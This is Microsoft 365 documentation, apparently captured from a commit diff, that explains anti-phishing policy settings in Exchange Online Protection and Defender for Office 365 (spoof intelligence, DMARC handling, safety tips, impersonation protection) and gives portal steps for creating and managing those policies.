- - [Spoof intelligence insight in EOP](anti-spoofing-spoof-intelligence.md)
- - [Spoofed senders in the Tenant Allow/Block List](tenant-allow-block-list-email-spoof-configure.md#spoofed-senders-in-the-tenant-allowblock-list)
-
- > [!NOTE]
- >
- > - Anti-spoofing protection is enabled in the Standard and Strict preset security policies, and is enabled by default in the default anti-phishing policy and in new custom anti-phishing policies that you create.
- > - You don't need to disable anti-spoofing protection if your MX record doesn't point to Microsoft 365; you enable Enhanced Filtering for Connectors instead. For instructions, see [Enhanced Filtering for Connectors in Exchange Online](/Exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/enhanced-filtering-for-connectors).
- > - Disabling anti-spoofing protection only disables _implicit_ spoofing protection from [composite authentication](email-authentication-about.md#composite-authentication) checks. For information about how _explicit_ [DMARC](email-authentication-dmarc-configure.md) checks are affected by anti-spoofing protection and the configuration of the source domain's DMARC policy (`p=quarantine` or `p=reject` in the DMARC TXT record), see the [Spoof protection and sender DMARC policies](#spoof-protection-and-sender-dmarc-policies) section.
--- **Unauthenticated sender indicators**: Available in the **Safety tips & indicators** section only when spoof intelligence is turned on. See the details in the next section.-- **Actions**: For messages from blocked spoofed senders (automatically blocked by spoof intelligence ([composite authentication](email-authentication-about.md#composite-authentication) failure plus malicious intent) or manually blocked in the Tenant Allow/Block list), you can also specify the action to take on the messages:
- - **Move messages to the recipients' Junk Email folders**: This is the default value. The message is delivered to the mailbox and moved to the Junk Email folder. For more information, see [Configure junk email settings on Exchange Online mailboxes in Microsoft 365](configure-junk-email-settings-on-exo-mailboxes.md).
- - **Quarantine the message**: Sends the message to quarantine instead of the intended recipients. For information about quarantine, see the following articles:
- - [Quarantine in Microsoft 365](quarantine-about.md)
- - [Manage quarantined messages and files as an admin in Microsoft 365](quarantine-admin-manage-messages-files.md)
- - [Find and release quarantined messages as a user in Microsoft 365](quarantine-end-user.md)
-
- If you select **Quarantine the message**, you can also select the quarantine policy that applies to messages that were quarantined by spoof intelligence protection. Quarantine policies define what users are able to do to quarantined messages, and whether users receive quarantine notifications. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
-### Spoof protection and sender DMARC policies
-
-In anti-phishing policies, you can control whether `p=quarantine` or `p=reject` values in sender DMARC policies are honored. If a message fails DMARC checks, you can specify separate actions for `p=quarantine` or `p=reject` in the sender's DMARC policy. The following settings are involved:
--- **Honor DMARC record policy when the message is detected as spoof**: This setting turns on honoring the sender's DMARC policy for explicit email authentication failures. When this setting is selected, the following settings are available:
- - **If the message is detected as spoof and DMARC Policy is set as p=quarantine**: The available actions are:
- - **Quarantine the message**
- - **Move the message to the recipients' Junk Email folders**
- - **If the message is detected as spoof and DMARC Policy is set as p=reject**: The available actions are:
- - **Quarantine the message**
- - **Reject the message**
-
- If you select **Quarantine the message** as an action, the quarantine policy that's selected for spoof intelligence protection is used.
--
-The relationship between spoof intelligence and whether sender DMARC policies are honored is described in the following table:
-
-|&nbsp;|Honor DMARC policy On|Honor DMARC policy Off|
-||||
-|**Spoof intelligence On**|Separate actions for implicit and explicit email authentication failures: <ul><li><u>Implicit failures</u>: Use the **If the message is detected as spoof by spoof intelligence** action in the anti-phishing policy.</li><li><u>Explicit failures</u>: <ul><li>DMARC policy `p=quarantine`: Use the **If the message is detected as spoof and DMARC policy is set as p=quarantine** action in the anti-phishing policy.</li><li>DMARC policy `p=reject`: Use the **If the message is detected as spoof and DMARC policy is set as p=reject** action in the anti-phishing policy.</li><li>DMARC policy `p=none`: No action is applied by Microsoft 365, but other protection features in the filtering stack are still able to act on the message.</li></ul></li></ul>|The **If the message is detected as spoof by spoof intelligence** action in the anti-phishing policy is used for both implicit and explicit email authentication failures. Explicit email authentication failures ignore `p=quarantine`, `p=reject`, `p=none`, or other values in the DMARC policy.|
-|**Spoof intelligence Off**|Implicit email authentication checks aren't used. <br/><br/> Explicit email authentication failures: <ul><li>DMARC policy `p=quarantine`: Use the **If the message is detected as spoof and DMARC policy is set as p=quarantine** action in the anti-phishing policy.</li><li>DMARC policy `p=reject`: Use the **If the message is detected as spoof and DMARC policy is set as p=reject** action in the anti-phishing policy.</li><li>DMARC policy `p=none`: The message isn't identified as spoofing by Microsoft 365, but other protection features in the filtering stack are still able to act on the message.</li></ul>|Implicit email authentication checks aren't used. <br/><br/> Explicit email authentication failures: <ul><li>DMARC policy `p=quarantine`: Messages are quarantined.</li><li>DMARC policy `p=reject`: Messages are quarantined.</li><li>DMARC policy `p=none`: No action is applied by Microsoft 365, but other protection features in the filtering stack are still able to act on the message.|
-
-> [!NOTE]
-> If the MX record for the Microsoft 365 domain points to a third-party service or device that sits in front of Microsoft 365, the **Honor DMARC policy** setting is applied only if [Enhanced Filtering for Connectors](/Exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/enhanced-filtering-for-connectors) is enabled for the connector that receives inbound messages.
->
-> Customers can override the **Honor DMARC policy** setting for specific email messages and/or senders using the following methods:
->
-> - [Admins](configure-junk-email-settings-on-exo-mailboxes.md#use-exchange-online-powershell-to-configure-the-safelist-collection-on-a-mailbox) or [users](https://support.microsoft.com/office/48c9f6f7-2309-4f95-9a4d-de987e880e46) can add the senders to the Safe Senders list in the user's mailbox.
-> - Admins can use the [spoof intelligence insight](anti-spoofing-spoof-intelligence.md#override-the-spoof-intelligence-verdict) or the [Tenant Allow/Block List](tenant-allow-block-list-email-spoof-configure.md#create-allow-entries-for-spoofed-senders) to allow messages from the spoofed sender.
-> - Admins create an Exchange mail flow rule (also known as a transport rule) for all users that allows messages for those particular senders.
-> - Admins create an Exchange mail flow rule for all users for rejected email that fails the organization's DMARC policy.
-
-### Unauthenticated sender indicators
-
-Unauthenticated sender indicators are part of the [Spoof settings](#spoof-settings) that are available in the **Safety tips & indicators** section in anti-phishing policies in both EOP and Defender for Office 365. The following settings are available only when spoof intelligence is turned on:
--- **Show (?) for unauthenticated senders for spoof**: Adds a question mark to the sender's photo in the From box if the message doesn't pass SPF or DKIM checks **and** the message doesn't pass DMARC or [composite authentication](email-authentication-about.md#composite-authentication). When this setting is turned off, the question mark isn't added to the sender's photo.--- **Show "via" tag**: Adds the "via" tag (chris@contoso.com <u>via</u> fabrikam.com) in the From box if the domain in the From address (the message sender that's displayed in email clients) is different from the domain in the DKIM signature or the **MAIL FROM** address. For more information about these addresses, see [An overview of email message standards](anti-phishing-from-email-address-validation.md#an-overview-of-email-message-standards).-
-To prevent the question mark or "via" tag from being added to messages from specific senders, you have the following options:
--- Allow the spoofed sender in the [spoof intelligence insight](anti-spoofing-spoof-intelligence.md) or manually in the [Tenant Allow/Block List](tenant-allow-block-list-about.md). Allowing the spoofed sender prevents the "via" tag from appearing in messages from the sender, even if the **Show "via" tag** setting is turned on in the policy.-- [Configure email authentication](email-authentication-about.md) for the sender domain.
- - For the question mark in the sender's photo, SPF or DKIM are the most important.
- - For the "via" tag, confirm the domain in the DKIM signature or the **MAIL FROM** address matches (or is a subdomain of) the domain in the From address.
-
-For more information, see [Identify suspicious messages in Outlook.com and Outlook on the web](https://support.microsoft.com/office/3d44102b-6ce3-4f7c-a359-b623bec82206)
-
-## First contact safety tip
-
-The **Show first contact safety tip** setting is available in EOP and Defender for Office 365 organizations and has no dependency on spoof intelligence or impersonation protection settings. The safety tip is shown to recipients in the following scenarios:
--- The first time they get a message from a sender-- They don't often get messages from the sender.-
-This capability adds an extra layer of protection against potential impersonation attacks, so we recommend that you turn it on.
-
-The first contact safety tip is controlled by the value 9.25 of the `SFTY` field in the **X-Forefront-Antispam-Report** header of the message. This functionality replaces the need to create mail flow rules (also known as transport rules) that add a header named **X-MS-Exchange-EnableFirstContactSafetyTip** with the value `Enable` to messages, although this capability is still available.
-
-Depending on the number of recipients in the message, the first contact safety tip can be either of the following values:
--- **Single recipient**:-
- > You don't often get email from \<email address\>.
-
- :::image type="content" source="../../media/safety-tip-first-contact-one-recipient.png" alt-text="The First contact safety tip for messages with one recipient" lightbox="../../media/safety-tip-first-contact-one-recipient.png":::
--- **Multiple recipients**:-
- > Some people who received this message don't often get email from \<email address\>.
-
- :::image type="content" source="../../media/safety-tip-first-contact-multiple-recipients.png" alt-text="The First contact safety tip for messages with multiple recipients" lightbox="../../media/safety-tip-first-contact-multiple-recipients.png":::
-
-> [!NOTE]
-> If the message has multiple recipients, whether the tip is shown and to whom is based on a majority model. If the majority of recipients have never or don't often receive messages from the sender, then the affected recipients will receive the **Some people who received this message...** tip. If you're concerned that this behavior exposes the communication habits of one recipient to another, you should not enable the first contact safety tip and continue to use mail flow rules and the **X-MS-Exchange-EnableFirstContactSafetyTip** header instead.
->
-> The first contact safety tip is not stamped in S/MIME signed messages.
-
-## Exclusive settings in anti-phishing policies in Microsoft Defender for Office 365
-
-This section describes the policy settings that are only available in anti-phishing policies in Defender for Office 365.
-
-> [!NOTE]
-> The default anti-phishing policy in Defender for Office 365 provides [spoof protection](anti-phishing-policies-about.md#spoof-settings) and mailbox intelligence for all recipients. However, the other available [impersonation protection](#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365) features and [advanced settings](anti-phishing-policies-about.md#advanced-phishing-thresholds-in-anti-phishing-policies-in-microsoft-defender-for-office-365) are not configured or enabled in the default policy. To enable all protection features, modify the default anti-phishing policy or create additional anti-phishing policies.
-
-### Impersonation settings in anti-phishing policies in Microsoft Defender for Office 365
-
-Impersonation is where the sender or the sender's email domain in a message looks similar to a real sender or domain:
--- An example impersonation of the domain contoso.com is ćóntoso.com.-- User impersonation is the combination of the user's display name and email address. For example, Valeria Barrios (vbarrios@contoso.com) might be impersonated as Valeria Barrios, but with a different email address.-
-> [!NOTE]
-> Impersonation protection looks for domains that are similar. For example, if your domain is contoso.com, we check for different top-level domains (.com, .biz, etc.), but also domains that are even somewhat similar. For example, contosososo.com or contoabcdef.com might be seen as impersonation attempts of contoso.com.
-
-An impersonated domain might otherwise be considered legitimate (the domain is registered, email authentication DNS records are configured, etc.), except the intent of the domain is to deceive recipients.
-
-The impersonation settings described in the following sections are available only in anti-phishing policies in Defender for Office 365.
-
-#### User impersonation protection
-
-User impersonation protection prevents specific internal or external email addresses from being impersonated **as message senders**. For example, you receive an email message from the Vice President of your company asking you to send her some internal company information. Would you do it? Many people would send the reply without thinking.
-
-You can use protected users to add internal and external sender email addresses to protect from impersonation. This list of **senders** that are protected from user impersonation is different from the list of **recipients** that the policy applies to (all recipients for the default policy; specific recipients as configured in the **Users, groups, and domains** setting in the [Common policy settings](#common-policy-settings) section).
-
-> [!NOTE]
-> You can specify a maximum of 350 users for user impersonation protection in each anti-phishing policy.
->
-> User impersonation protection does not work if the sender and recipient have previously communicated via email. If the sender and recipient have never communicated via email, the message can be identified as an impersonation attempt.
->
-> You might get the error "The email address already exists" if you try to add a user to user impersonation protection when that email address is already specified for user impersonation protection in another anti-phishing policy. This error occurs only in the Defender portal. You won't get the error if you use the corresponding _TargetedUsersToProtect_ parameter in the **New-AntiPhishPolicy** or **Set-AntiPhishPolicy** cmdlets in Exchange Online PowerShell.
-
-By default, no sender email addresses are configured for impersonation protection, either in the default policy or in custom policies.
-
-When you add internal or external email addresses to the **Users to protect** list, messages from those **senders** are subject to impersonation protection checks. The message is checked for impersonation **if** the message is sent to a **recipient** that the policy applies to (all recipients for the default policy; **Users, groups, and domains** recipients in custom policies). If impersonation is detected in the sender's email address, the action for impersonated users is applied to the message.
-
-For detected user impersonation attempts, the following actions are available:
--- **Don't apply any action**: This is the default action.-- **Redirect the message to other email addresses**: Sends the message to the specified recipients instead of the intended recipients.-- **Move messages to the recipients' Junk Email folders**: The message is delivered to the mailbox and moved to the Junk Email folder. For more information, see [Configure junk email settings on Exchange Online mailboxes in Microsoft 365](configure-junk-email-settings-on-exo-mailboxes.md).-- **Quarantine the message**: Sends the message to quarantine instead of the intended recipients. For information about quarantine, see the following articles:
- - [Quarantine in Microsoft 365](quarantine-email-messages.md)
- - [Manage quarantined messages and files as an admin in Microsoft 365](manage-quarantined-messages-and-files.md)
- - [Find and release quarantined messages as a user in Microsoft 365](find-and-release-quarantined-messages-as-a-user.md)
-
- If you select **Quarantine the message**, you can also select the quarantine policy that applies to messages that are quarantined by user impersonation protection. Quarantine policies define what users are able to do to quarantined messages. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
--- **Deliver the message and add other addresses to the Bcc line**: Deliver the message to the intended recipients and silently deliver the message to the specified recipients.-- **Delete the message before it's delivered**: Silently delete the entire message, including all attachments.-
-#### Domain impersonation protection
-
-Domain impersonation protection prevents specific domains **in the sender's email address** from being impersonated. For example, all domains that you own ([accepted domains](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains)) or specific custom domains (domains you own or partner domains). **Sender domains** that are protected from impersonation is different from the list of **recipients** that the policy applies to (all recipients for the default policy; specific recipients as configured in the **Users, groups, and domains** setting in the [Common policy settings](#common-policy-settings) section).
-
-> [!NOTE]
-> You can specify a maximum of 50 custom domains for domain impersonation protection in each anti-phishing policy.
-
-Messages from **senders** in the specified domains are subject to impersonation protection checks. The message is checked for impersonation **if** the message is sent to a **recipient** that the policy applies to (all recipients for the default policy; **Users, groups, and domains** recipients in custom policies). If impersonation is detected in the domain of the sender's email address, the action for domain impersonation is applied to the message.
-
-By default, no sender domains are configured for impersonation protection, either in the default policy or in custom policies.
-
-For detected domain impersonation attempts, the following actions are available:
--- **Don't apply any action**: This is the default value.-- **Redirect the message to other email addresses**: Sends the message to the specified recipients instead of the intended recipients.-- **Move messages to the recipients' Junk Email folders**: The message is delivered to the mailbox and moved to the Junk Email folder. For more information, see [Configure junk email settings on Exchange Online mailboxes in Microsoft 365](configure-junk-email-settings-on-exo-mailboxes.md).--- **Quarantine the message**: Sends the message to quarantine instead of the intended recipients. For information about quarantine, see the following articles:
- - [Quarantine in Microsoft 365](quarantine-email-messages.md)
- - [Manage quarantined messages and files as an admin in Microsoft 365](manage-quarantined-messages-and-files.md)
- - [Find and release quarantined messages as a user in Microsoft 365](find-and-release-quarantined-messages-as-a-user.md)
-
- If you select **Quarantine the message**, you can also select the quarantine policy that applies to messages that are quarantined by domain impersonation protection. Quarantine policies define what users are able to do to quarantined messages. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
--- **Deliver the message and add other addresses to the Bcc line**: Deliver the message to the intended recipients and silently deliver the message to the specified recipients.-- **Delete the message before it's delivered**: Silently deletes the entire message, including all attachments.-
-#### Mailbox intelligence impersonation protection
-
-Mailbox intelligence uses artificial intelligence (AI) to determine user email patterns with their frequent contacts.
-
-For example, Gabriela Laureano (glaureano@contoso.com) is the CEO of your company, so you add her as a protected sender in the **Enable users to protect** settings of the policy. But, some of the recipients in the policy communicate regularly with a vendor who is also named Gabriela Laureano (glaureano@fabrikam.com). Because those recipients have a communication history with glaureano@fabrikam.com, mailbox intelligence doesn't identify messages from glaureano@fabrikam.com as an impersonation attempt of glaureano@contoso.com for those recipients.
-
-> [!NOTE]
-> Mailbox intelligence protection does not work if the sender and recipient have previously communicated via email. If the sender and recipient have never communicated via email, the message can be identified as an impersonation attempt by mailbox intelligence.
-
-Mailbox intelligence has two specific settings:
--- **Enable mailbox intelligence**: Turn mailbox intelligence on or off. This setting helps the AI distinguish between messages from legitimate and impersonated senders. By default, this setting is turned on.-- **Enable intelligence for impersonation protection**: By default, this setting is turned off. Use the contact history learned from mailbox intelligence (both frequent contacts and no contact) to help protect users from impersonation attacks. For mailbox intelligence to take action on detected messages, this setting and the **Enable mailbox intelligence** setting both need to be turned on.-
-For impersonation attempts detected by mailbox intelligence, the following actions are available:
--- **Don't apply any action**: This is the default value. This action has the same result as when **Enable mailbox intelligence** is turned on but **Enable intelligence impersonation protection** is turned off.-- **Redirect the message to other email addresses**-- **Move the message to the recipients' Junk Email folders**-- **Quarantine the message**: If you select this action, you can also select the quarantine policy that applies to messages that are quarantined by mailbox intelligence protection. Quarantine policies define what users are able to do to quarantined messages, and whether users receive quarantine notifications. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).-- **Deliver the message and add other addresses to the Bcc line**-- **Delete the message before it's delivered**-
-#### Impersonation safety tips
-
-Impersonation safety tips appear to users when messages are identified as impersonation attempts. The following safety tips are available:
--- **Show user impersonation safety tip**: The From address contains a user specified in [user impersonation protection](#user-impersonation-protection). Available only if **Enable users to protect** is turned on and configured.-
- This safety tip is controlled by the value 9.20 of the `SFTY` field in the **X-Forefront-Antispam-Report** header of the message. The text says:
-
- > This sender appears similar to someone who previously sent you email, but may not be that person.
--- **Show domain impersonation safety tip**: The From address contains a domain specified in [domain impersonation protection](#domain-impersonation-protection). Available only if **Enable domains to protect** is turned on and configured.-
- This safety tip is controlled by the value 9.19 of the `SFTY` field in the **X-Forefront-Antispam-Report** header of the message. The text says:
-
- > This sender might be impersonating a domain that's associated with your organization.
--- **Show user impersonation unusual characters safety tip**: The From address contains unusual character sets (for example, mathematical symbols and text or a mix of uppercase and lowercase letters) in a sender specified in [user impersonation protection](#user-impersonation-protection). Available only if **Enable users to protect** is turned on and configured. The text says:-
- > The email address `<email address>` includes unexpected letters or numbers. We recommend you don't interact with this message.
-
-> [!NOTE]
-> Safety tips are not stamped in the following messages:
->
-> - S/MIME signed messages.
-> - Messages that are allowed by your organizational settings.
-
-#### Trusted senders and domains
-
-Trusted senders and domain are exceptions to the impersonation protection settings. Messages from the specified senders and sender domains are never classified as impersonation-based attacks by the policy. In other words, the action for protected senders, protected domains, or mailbox intelligence protection aren't applied to these trusted senders or sender domains. The maximum limit for these lists is 1024 entries.
-
-> [!NOTE]
-> Trusted domain entries don't include subdomains of the specified domain. You need to add an entry for each subdomain.
->
-> If Microsoft 365 system messages from the following senders are identified as impersonation attempts, you can add the senders to the trusted senders list:
->
-> - `noreply@email.teams.microsoft.com`
-> - `noreply@emeaemail.teams.microsoft.com`
-> - `no-reply@sharepointonline.com`
-
-### Advanced phishing thresholds in anti-phishing policies in Microsoft Defender for Office 365
-
-The following advanced phishing thresholds are only available in anti-phishing policies in Defender for Office 365. These thresholds control the sensitivity for applying machine learning models to messages to determine a phishing verdict:
--- **1 - Standard**: This is the default value. The severity of the action that's taken on the message depends on the degree of confidence that the message is phishing (low, medium, high, or very high confidence). For example, messages that are identified as phishing with a very high degree of confidence have the most severe actions applied, while messages that are identified as phishing with a low degree of confidence have less severe actions applied.-- **2 - Aggressive**: Messages that are identified as phishing with a high degree of confidence are treated as if they were identified with a very high degree of confidence.-- **3 - More aggressive**: Messages that are identified as phishing with a medium or high degree of confidence are treated as if they were identified with a very high degree of confidence.-- **4 - Most aggressive**: Messages that are identified as phishing with a low, medium, or high degree of confidence are treated as if they were identified with a very high degree of confidence.-
-The chance of false positives (good messages marked as bad) increases as you increase this setting. For information about the recommended settings, see [anti-phishing policy settings in Microsoft Defender for Office 365](recommended-settings-for-eop-and-office365.md#anti-phishing-policy-settings-in-microsoft-defender-for-office-365).
security Anti Phishing Policies Eop Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-phishing-policies-eop-configure.md
- Title: Configure anti-phishing policies in EOP
- - NOCSH
-----
- - m365-security
- - tier2
-
-description: Admins can learn how to create, modify, and delete the anti-phishing policies that are available in Exchange Online Protection (EOP) organizations with or without Exchange Online mailboxes.
- Previously updated : 4/8/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
--
-# Configure anti-phishing policies in EOP
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, anti-phishing policies provide anti-spoofing protection. For more information, see [Spoof settings in anti-phishing policies](anti-phishing-policies-about.md#spoof-settings).
-
-The default anti-phishing policy automatically applies to all recipients. For greater granularity, you can also create custom anti-phishing policies that apply to specific users, groups, or domains in your organization.
-
-You configure anti-phishing policies in the Microsoft Defender portal or in PowerShell (Exchange Online PowerShell for Microsoft 365 organizations with mailboxes in Exchange Online; standalone EOP PowerShell for organizations without Exchange Online mailboxes).
-
-For anti-phishing policy procedures in organizations with Microsoft Defender for Office 365, see [Configure anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-mdo-configure.md).
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Anti-phishing** page, use <https://security.microsoft.com/antiphishing>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell). To connect to standalone EOP PowerShell, see [Connect to Exchange Online Protection PowerShell](/powershell/exchange/connect-to-exchange-online-protection-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):
- - _Add, modify, and delete policies_: Membership in the **Organization Management** or **Security Administrator** role groups.
- - _Read-only access to policies_: Membership in the **Global Reader**, **Security Reader**, or **View-Only Organization Management** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- For our recommended settings for anti-phishing policies in Defender for Office 365, see [Anti-phishing policy in Defender for Office 365 settings](recommended-settings-for-eop-and-office365.md#anti-phishing-policy-settings-in-microsoft-defender-for-office-365).-
- > [!TIP]
- > Settings in the default or custom anti-phishing policies are ignored if a recipient is also included in the [Standard or Strict preset security policies](preset-security-policies.md). For more information, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
--- Allow up to 30 minutes for a new or updated policy to be applied.-
-## Use the Microsoft Defender portal to create anti-phishing policies
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-phishing** in the **Policies** section. To go directly to the **Anti-phishing** page, use <https://security.microsoft.com/antiphishing>.
-
-2. On the **Anti-phishing** page, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create** to open the new anti-phishing policy wizard.
-
-3. On the **Policy name** page, configure these settings:
- - **Name**: Enter a unique, descriptive name for the policy.
- - **Description**: Enter an optional description for the policy.
-
- When you're finished on the **Policy name** page, select **Next**.
-
-4. On the **Users, groups, and domains** page, identify the internal recipients that the policy applies to (recipient conditions):
- - **Users**: The specified mailboxes, mail users, or mail contacts.
- - **Groups**:
- - Members of the specified distribution groups or mail-enabled security groups (dynamic distribution groups aren't supported).
- - The specified Microsoft 365 Groups.
- - **Domains**: All recipients in the organization with a primary email address in the specified [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).
-
- Click in the appropriate box, start typing a value, and select the value that you want from the results. Repeat this process as many times as necessary. To remove an existing value, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value.
-
- For users or groups, you can use most identifiers (name, display name, alias, email address, account name, etc.), but the corresponding display name is shown in the results. For users or groups, enter an asterisk (\*) by itself to see all available values.
-
- You can use a condition only once, but the condition can contain multiple values:
-
- - Multiple **values** of the **same condition** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy is applied to them.
- - Different **types of conditions** use AND logic. The recipient must match **all** of the specified conditions for the policy to apply to them. For example, you configure a condition with the following values:
- - Users: `romain@contoso.com`
- - Groups: Executives
-
- The policy is applied to `romain@contoso.com` _only_ if he's also a member of the Executives group. Otherwise, the policy isn't applied to him.
-
- - **Exclude these users, groups, and domains**: To add exceptions for the internal recipients that the policy applies to (recipient exceptions), select this option and configure the exceptions.
-
- You can use an exception only once, but the exception can contain multiple values:
-
- - Multiple **values** of the **same exception** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy isn't applied to them.
- - Different **types of exceptions** use OR logic (for example, _\<recipient1\>_ or _\<member of group1\>_ or _\<member of domain1\>_). If the recipient matches **any** of the specified exception values, the policy isn't applied to them.
-
- When you're finished on the **Users, groups, and domains** page, select **Next**.
-
-5. On the **Phishing threshold & protection** page, use the **Enable spoof intelligence** check box to turn spoof intelligence on or off. This setting is selected by default, and we recommend that you leave it selected. You specify the action to take on messages from blocked spoofed senders on the next page.
-
- To turn off spoof intelligence, clear the check box.
-
- > [!NOTE]
- > You don't need to turn off spoof intelligence if your MX record doesn't point to Microsoft 365; you enable Enhanced Filtering for Connectors instead. For instructions, see [Enhanced Filtering for Connectors in Exchange Online](/Exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/enhanced-filtering-for-connectors).
-
- When you're finished on the **Phishing threshold & protection** page, select **Next**.
-
-6. On the **Actions** page, configure the following settings:
-
- - **Honor DMARC record policy when the message is detected as spoof**: This setting is selected by default, and allows you to control what happens to messages where the sender fails explicit [DMARC](email-authentication-dmarc-configure.md) checks and the DMARC policy is set to `p=quarantine` or `p=reject`:
- - **If the message is detected as spoof and DMARC Policy is set as p=quarantine**: Select one of the following actions:
- - **Quarantine the message**: This is the default value.
- - **Move message to the recipients' Junk Email folders**
-
- - **If the message is detected as spoof and DMARC Policy is set as p=reject**: Select one of the following actions:
- - **Quarantine the message**
- - **Reject the message**: This is the default value.
-
- For more information, see [Spoof protection and sender DMARC policies](anti-phishing-policies-about.md#spoof-protection-and-sender-dmarc-policies).
-
- - **If the message is detected as spoof by spoof intelligence**: This setting is available only if you selected **Enable spoof intelligence** on the previous page. Select one of the following actions in the dropdown list for messages from blocked spoofed senders:
- - **Move the message to the recipients' Junk Email folders** (default)
- - **Quarantine the message**: If you select this action, an **Apply quarantine policy** box appears where you select the quarantine policy that applies to messages that are quarantined by spoof intelligence protection.
-
- If you don't select a quarantine policy, the default quarantine policy for spoof intelligence detections is used (DefaultFullAccessPolicy). When you later view or edit the anti-phishing policy settings, the quarantine policy name is shown.
-
- - **Safety tips & indicators** section: Configure the following settings:
- - **Show first contact safety tip**: For more information, see [First contact safety tip](anti-phishing-policies-about.md#first-contact-safety-tip).
- - **Show (?) for unauthenticated senders for spoof**: This setting is available only if you selected **Enable spoof intelligence** on the previous page. Adds a question mark (?) to the sender's photo in the From box in Outlook if the message doesn't pass SPF or DKIM checks **and** the message doesn't pass DMARC or [composite authentication](email-authentication-about.md#composite-authentication). This setting is selected by default.
- - **Show "via" tag**: This setting is available only if you selected **Enable spoof intelligence** on the previous page. Adds tag named via (`chris@contoso.com` via fabrikam.com) to the From address if it's different from the domain in the DKIM signature or the **MAIL FROM** address. This setting is selected by default.
-
- To turn on a setting, select the check box. To turn it off, clear the check box.
-
- When you're finished on the **Actions** page, select **Next**.
-
-7. On the **Review** page, review your settings. You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- When you're finished on the **Review** page, select **Submit**.
-
-8. On the **New anti-phishing policy created** page, you can select the links to view the policy, view anti-phishing policies, and learn more about anti-phishing policies.
-
- When you're finished on the **New anti-phishing policy created** page, select **Done**.
-
- Back on the **Anti-phishing** page, the new policy is listed.
-
-## Use the Microsoft Defender portal to view anti-phishing policy details
-
-In the Microsoft Defender portal, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-phishing** in the **Policies** section. Or, to go directly to the **Anti-phishing** page, use <https://security.microsoft.com/antiphishing>.
-
-On the **Anti-phishing** page, the following properties are displayed in the list of anti-phishing policies:
--- **Name**-- **Status**: Values are:
- - **Always on** for the default anti-phishing policy.
- - **On** or **Off** for other anti-spam policies.
-- **Priority**: For more information, see the [Set the priority of custom anti-spam policies](#use-the-microsoft-defender-portal-to-set-the-priority-of-custom-anti-phishing-policies) section.-
-To change the list of policies from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to filter the policies by **Time range** (creation date) or **Status**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific anti-phishing policies.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the list of policies to a CSV file.
-
-Select a policy by clicking anywhere in the row other than the check box next to the name to open the details flyout for the policy.
-
-> [!TIP]
-> To see details about other anti-phishing policies without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-## Use the Microsoft Defender portal to take action on anti-phishing policies
-
-1. In the Microsoft Defender portal, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-phishing** in the **Policies** section. Or, to go directly to the **Anti-phishing** page, use <https://security.microsoft.com/antiphishing>.
-
-2. On the **Anti-phishing** page, select the anti-phishing policy by using either of the following methods:
-
- - Select the policy from the list by selecting the check box next to the name. The following actions are available in the :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** dropdown list that appears:
- - **Enable selected policies**.
- - **Disable selected policies**.
- - **Delete selected policies**.
-
- :::image type="content" source="../../media/anti-phishing-policies-main-page.png" alt-text="The Anti-phishing page with a policy selected and the More actions control expanded." lightbox="../../media/anti-phishing-policies-main-page.png":::
-
- - Select the policy from the list by clicking anywhere in the row other than the check box next to the name. Some or all following actions are available in the details flyout that opens:
